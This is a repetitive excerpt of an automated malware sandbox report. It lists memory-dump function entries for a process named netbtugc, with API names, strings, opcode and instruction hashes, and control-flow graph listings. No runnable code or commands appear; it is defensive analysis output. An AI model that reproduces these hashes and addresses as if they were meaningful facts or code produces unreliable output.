                                                            • Source File: 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2eb0000_netbtugc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 1277c21f70e34f5d153a20fd85beb1994a793592790f78d03f41db3864284396
                                                            • Instruction ID: d6cd72cb3c6eaa080ab87bfe6c6165e1f55635e782779f263c8e0245cf8609ac
                                                            • Opcode Fuzzy Hash: 1277c21f70e34f5d153a20fd85beb1994a793592790f78d03f41db3864284396
                                                            • Instruction Fuzzy Hash: 22900225221400120546B558460450B145597D63D1395C015F241A590CC62589656321
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2eb0000_netbtugc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 32c46549dd160975c3001ab703267a6ffcf2aa1af64b7c090ebc70e10ab547ff
                                                            • Instruction ID: b7ec9d84f12b8f78760a87b980e0ef1d26effcedb7edae9c3b1a8a39b56af068
                                                            • Opcode Fuzzy Hash: 32c46549dd160975c3001ab703267a6ffcf2aa1af64b7c090ebc70e10ab547ff
                                                            • Instruction Fuzzy Hash: 42900435311400130507F55C47045071057C7D53D1355C031F301D550CD735CD717131
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2eb0000_netbtugc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 890c6f3bd778c24ead7fada1707911fc7fcadfb3aeef46f058bf1fd794988224
                                                            • Instruction ID: ed049d1191c9348a76530cc7429788e4b43c648cbe0066775cf24f43f47e09ec
                                                            • Opcode Fuzzy Hash: 890c6f3bd778c24ead7fada1707911fc7fcadfb3aeef46f058bf1fd794988224
                                                            • Instruction Fuzzy Hash: CA90023120140812D5817158840464B101587D1381F95C015F1029654DCA198B5977A1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2eb0000_netbtugc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 6b5b2dd08bbfd72608884f662c5b3fe4f180ee9837bc8d07450a8fe67d4ea15d
                                                            • Instruction ID: f9867cb046b03b93cfb7c37a17147a9788bb593f3156ef13cf18124800f9ca93
                                                            • Opcode Fuzzy Hash: 6b5b2dd08bbfd72608884f662c5b3fe4f180ee9837bc8d07450a8fe67d4ea15d
                                                            • Instruction Fuzzy Hash: 5590023120544852D54171588404A47102587D0385F55C011F1068694D96298E55B661
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2eb0000_netbtugc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 6004dbd1454c7e6037cae47b7e1199b68f244b114a5b4ead3493333990b3fb2f
                                                            • Instruction ID: 3c2365cda3cb3e8728c24619d69f473e0bf480dcc87811b56520331d569d7cd0
                                                            • Opcode Fuzzy Hash: 6004dbd1454c7e6037cae47b7e1199b68f244b114a5b4ead3493333990b3fb2f
                                                            • Instruction Fuzzy Hash: 5690023160540812D55171588414747101587D0381F55C011F1028654D87598B5576A1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2eb0000_netbtugc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 65c807b62a5adee7f03a9dde5319d5354b6124829cedb49d046b9732de5b71b7
                                                            • Instruction ID: fa47a533947210286c8ed95bb6c40be7f35519c62372bd037548cbdd39cca470
                                                            • Opcode Fuzzy Hash: 65c807b62a5adee7f03a9dde5319d5354b6124829cedb49d046b9732de5b71b7
                                                            • Instruction Fuzzy Hash: 0190026120240013450671588414617501A87E0281B55C021F2018590DC52989917125
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2eb0000_netbtugc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: b0035b3e3449de64e7458ff099c67f19b7e1b5b70bde79be13354384d0369a52
                                                            • Instruction ID: a451121faae9cb65933adee970c946790069bb108b1c648e640396fca564f7fe
                                                            • Opcode Fuzzy Hash: b0035b3e3449de64e7458ff099c67f19b7e1b5b70bde79be13354384d0369a52
                                                            • Instruction Fuzzy Hash: C890022124545112D551715C84046175015A7E0281F55C021F1818594D855989557221
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2eb0000_netbtugc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 42b5efef42e525f62ab04f3c9a37ac942c04e397262f5e467dd212544b0f73e6
                                                            • Instruction ID: 8ebe3bf04869f7e0de3a9336c8ee27d962eaa6dbb30aa50e487b4633f2220158
                                                            • Opcode Fuzzy Hash: 42b5efef42e525f62ab04f3c9a37ac942c04e397262f5e467dd212544b0f73e6
                                                            • Instruction Fuzzy Hash: 0E90026120180413D54175588804607101587D0382F55C011F3068555E8A2D8D517135
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2eb0000_netbtugc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: ee950da8edbcc72e2b1fb618053cad416db8a688cbb9d09e2b971e9fc9972f9b
                                                            • Instruction ID: 371cac99f7da643c3810e1e7edf6b841c250cf39a44dbd1a07a6b8847c91cf84
                                                            • Opcode Fuzzy Hash: ee950da8edbcc72e2b1fb618053cad416db8a688cbb9d09e2b971e9fc9972f9b
                                                            • Instruction Fuzzy Hash: BC90022160140512D50271588404617101A87D02C1F95C022F2028555ECA298A92B131
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2eb0000_netbtugc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 006dd1d41fef93f601965b48fe9569b600b3a0a6c445d312ddacf07772fb3805
                                                            • Instruction ID: 7bd69beaa70e0efb344469141eb49ba98790edaf6de304821c70192e6cc2138d
                                                            • Opcode Fuzzy Hash: 006dd1d41fef93f601965b48fe9569b600b3a0a6c445d312ddacf07772fb3805
                                                            • Instruction Fuzzy Hash: D7900221211C0052D60175688C14B07101587D0383F55C115F1158554CC91989616521
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2eb0000_netbtugc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: f1c7cfde45562fe8dd0d6eec2089473ac346ad989e37a69571d092387f838ca2
                                                            • Instruction ID: a5787acf09f61300f2a07faabc40cbc3445a886bd77085ef588f0d839de42b55
                                                            • Opcode Fuzzy Hash: f1c7cfde45562fe8dd0d6eec2089473ac346ad989e37a69571d092387f838ca2
                                                            • Instruction Fuzzy Hash: 349002216014005245417168C8449075015ABE1291755C121F199C550D855D89656665
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2eb0000_netbtugc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: d442d3514e64d14476f569de5967103e5b8871c5f669069cf6141668b3bfa037
                                                            • Instruction ID: e5211ba84cd3cd86996592eee33eef8c71926c277098925e6a5c40b751c71ecb
                                                            • Opcode Fuzzy Hash: d442d3514e64d14476f569de5967103e5b8871c5f669069cf6141668b3bfa037
                                                            • Instruction Fuzzy Hash: 2290026134140452D50171588414B071015C7E1381F55C015F2068554D861DCD527126
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2eb0000_netbtugc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 791378b52e6971aaff65eb97af9fe9f8b9fd41b7eb2886450803663800dc2372
                                                            • Instruction ID: a3419f4cb2448af62bac8cedb3e8407b8536349ae85124a71c9a834c4d21453b
                                                            • Opcode Fuzzy Hash: 791378b52e6971aaff65eb97af9fe9f8b9fd41b7eb2886450803663800dc2372
                                                            • Instruction Fuzzy Hash: 5890023120140412D50175989408647101587E0381F55D011F6028555EC66989917131
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2eb0000_netbtugc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: aa5ef7f7424a950197c122b0f84b64397dd3d0438c1c26ae61ac4c9d8b434285
                                                            • Instruction ID: 460fc680e8afb8b635ca1e9cc65e5f5d97263a9263178c19d89f58f23e5a9a91
                                                            • Opcode Fuzzy Hash: aa5ef7f7424a950197c122b0f84b64397dd3d0438c1c26ae61ac4c9d8b434285
                                                            • Instruction Fuzzy Hash: 1090023120148812D5117158C40474B101587D0381F59C411F5428658D869989917121
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2eb0000_netbtugc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: e3bf5c951db2cc25c786ea91e207129672cf12d7bcc8f6101a97072f86a3c6d9
                                                            • Instruction ID: 41f4a24ca203851ec87a4b2dcc2637e4c325aa1bbad528f86861125921b78cdc
                                                            • Opcode Fuzzy Hash: e3bf5c951db2cc25c786ea91e207129672cf12d7bcc8f6101a97072f86a3c6d9
                                                            • Instruction Fuzzy Hash: DB90023120140852D50171588404B47101587E0381F55C016F1128654D8619C9517521
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2eb0000_netbtugc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: a5f96caf69554fcffd7a49a10a78090d77f800526f954e3c23aaa63a303e30c7
                                                            • Instruction ID: 01a152c9f424cf4d30e31a4e8050964691c04adce34536af8da5e58e48647d2c
                                                            • Opcode Fuzzy Hash: a5f96caf69554fcffd7a49a10a78090d77f800526f954e3c23aaa63a303e30c7
                                                            • Instruction Fuzzy Hash: AC90023120140423D51271588504707101987D02C1F95C412F1428558D965A8A52B121
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2eb0000_netbtugc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 772b0fa265849fb771ad161c5e7cd2d858cb6dbc6fcbff4898ea026a46ca336c
                                                            • Instruction ID: a3faba036db1cb483012937c203c376fbc8cb0e58eecfc72575c38cd3c64cfbc
                                                            • Opcode Fuzzy Hash: 772b0fa265849fb771ad161c5e7cd2d858cb6dbc6fcbff4898ea026a46ca336c
                                                            • Instruction Fuzzy Hash: FF900221242441625946B1588404507501697E02C1795C012F2418950C852A9956E621
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2eb0000_netbtugc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: edaf9c1191180569c9def3dcc4ba9108eba9f739e9ad5fa047cdc4447178549c
                                                            • Instruction ID: bc09fd5525564079d71cd5aaf5675a9ce97846ddfaacf6df0ae80fe7990da285
                                                            • Opcode Fuzzy Hash: edaf9c1191180569c9def3dcc4ba9108eba9f739e9ad5fa047cdc4447178549c
                                                            • Instruction Fuzzy Hash: E990022130140013D541715894186075015D7E1381F55D011F1418554CD91989566222
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2eb0000_netbtugc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: d50523e85d944866564f7169d8af21c9aa71d6b8834d6c8f5a8d7f09ccf3e30e
                                                            • Instruction ID: 457f9e0a0a7ce9b6b99b1dbd3ddd357dd4c87b741c0c87bb4973aa821c08fb20
                                                            • Opcode Fuzzy Hash: d50523e85d944866564f7169d8af21c9aa71d6b8834d6c8f5a8d7f09ccf3e30e
                                                            • Instruction Fuzzy Hash: 0A90022921340012D5817158940860B101587D1282F95D415F1019558CC91989696321

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 513 25605d2-25605df 514 25605e1-25605fb 513->514 515 2560568 513->515 516 25605fe-2560600 514->516 517 256059d-25605a9 515->517 518 2560602-256060b 516->518 519 256061d 516->519 517->516 520 25605ab-25605b1 517->520 521 25605c0-25605c4 518->521 522 256060d-2560619 518->522 523 2560647 519->523 524 256061f-2560629 519->524 525 25605b2-25605b7 520->525 528 25605c5-25605cc 521->528 522->519 527 2560649-2560660 523->527 524->525 526 256062b-256062d 524->526 525->521 529 2560662-256066b 527->529 530 25606bc-25606c6 527->530 528->528 531 25605ce 528->531 534 256066f-256068e 529->534 533 2560700-256076e call 2579b10 call 257a520 call 25640a0 call 2551420 call 2570ee0 530->533 531->517 532 25605d0 531->532 532->513 549 2560790-2560795 533->549 550 2560770-2560781 PostThreadMessageW 533->550 534->534 535 2560690-2560699 534->535 535->527 537 256069b-25606a3 535->537 537->533 540 25606a5-25606ba 537->540 540->530 550->549 551 2560783-256078d 550->551 551->549
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2550000_netbtugc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: F56GKLK7U4$F56GKLK7U4
                                                            • API String ID: 0-2839762430
                                                            • Opcode ID: 9447954adc385025b70b311f7469ab317e80501ada11cd4050a658c8d1f3300b
                                                            • Instruction ID: 5a90e8218db3e542580edce60f5a0e73c23e44ae0771211d5d060042080cf130
                                                            • Opcode Fuzzy Hash: 9447954adc385025b70b311f7469ab317e80501ada11cd4050a658c8d1f3300b
                                                            • Instruction Fuzzy Hash: 2051FB72850656ABDB11EE34C88ABEEBFB5FB51320F504658D940DB2C2E7209943CB9D

                                                            Control-flow Graph

                                                            APIs
                                                            • PostThreadMessageW.USER32(F56GKLK7U4,00000111,00000000,00000000), ref: 0256077D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2550000_netbtugc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: F56GKLK7U4$F56GKLK7U4
                                                            • API String ID: 1836367815-2839762430
                                                            • Opcode ID: 0006bbca69ebf85fba32096ca151e8d08103d0d355250275e1f4d529af257a6d
                                                            • Instruction ID: 32f61637b7c3cf815e96efb804cff375165b3ccc8d3585e6628a7a252e8ed1a9
                                                            • Opcode Fuzzy Hash: 0006bbca69ebf85fba32096ca151e8d08103d0d355250275e1f4d529af257a6d
                                                            • Instruction Fuzzy Hash: 9A11D671D4121976EB21EA94DC45FEF7F7DAF81B50F008054FA047B2C1E6B4AA068BE9

                                                            Control-flow Graph

                                                            APIs
                                                            • PostThreadMessageW.USER32(F56GKLK7U4,00000111,00000000,00000000), ref: 0256077D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2550000_netbtugc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: F56GKLK7U4$F56GKLK7U4
                                                            • API String ID: 1836367815-2839762430
                                                            • Opcode ID: d8ba68af7a922255352bf53ab66208c7b38438c7da1e66d6a84180756af733d4
                                                            • Instruction ID: 56f9a7dc3d60cae12e41988b6f4decf2d3952c0ddffa9053e78538a82a4178d1
                                                            • Opcode Fuzzy Hash: d8ba68af7a922255352bf53ab66208c7b38438c7da1e66d6a84180756af733d4
                                                            • Instruction Fuzzy Hash: F001D671D4021876EB21AA90DC05FEF7B7CAF81B50F008054FA047B1C0E6B4A6028BE9
                                                            APIs
                                                            • Sleep.KERNELBASE(000007D0), ref: 0257287B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2550000_netbtugc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID: net.dll$wininet.dll
                                                            • API String ID: 3472027048-1269752229
                                                            • Opcode ID: 43dbf1287cf106e20e48480217a8d404d2c20be155fbde4e0fbb09336f524d7a
                                                            • Instruction ID: 244851dfc7741800b52309744a858358360e87009bf0475290733e238984840a
                                                            • Opcode Fuzzy Hash: 43dbf1287cf106e20e48480217a8d404d2c20be155fbde4e0fbb09336f524d7a
                                                            • Instruction Fuzzy Hash: 50319EB1641305BBD718DF60D880FE7BBB9BB88314F00862DEA5D9B241D770B644CBA5
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 0256E867
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2550000_netbtugc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Initialize
                                                            • String ID: @J7<
                                                            • API String ID: 2538663250-2016760708
                                                            • Opcode ID: da73c5a719910af0c0e7d9aac22506276bfd97d49d93b4a74b71ca8677ee24b9
                                                            • Instruction ID: 84436a051429d347f4dcf6aa2e18511df9c06a839555409ff6034499221800db
                                                            • Opcode Fuzzy Hash: da73c5a719910af0c0e7d9aac22506276bfd97d49d93b4a74b71ca8677ee24b9
                                                            • Instruction Fuzzy Hash: A7312DB6A0020AAFDB00DFD8D880DEEB7B9BF88304B108559E505EB214D775EE05CBA4
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 0256E867
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_2550000_netbtugc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Initialize
                                                            • String ID: @J7<
                                                            • API String ID: 2538663250-2016760708
                                                            • Opcode ID: f69a3344edb3d537d19e2d7384e962b82125176d8f55544750b292cf13607115
                                                            • Instruction ID: c9d4e64c9eae0e417e8ac64f55534cfd282ccf2209e053c41c248d775b2c641a
                                                            • Opcode Fuzzy Hash: f69a3344edb3d537d19e2d7384e962b82125176d8f55544750b292cf13607115
                                                            • Instruction Fuzzy Hash: 03313DB6A0020AAFDB00DFD8D880DEEB7B9FF88304B108559E505EB214D775AE05CBA0
                                                            APIs
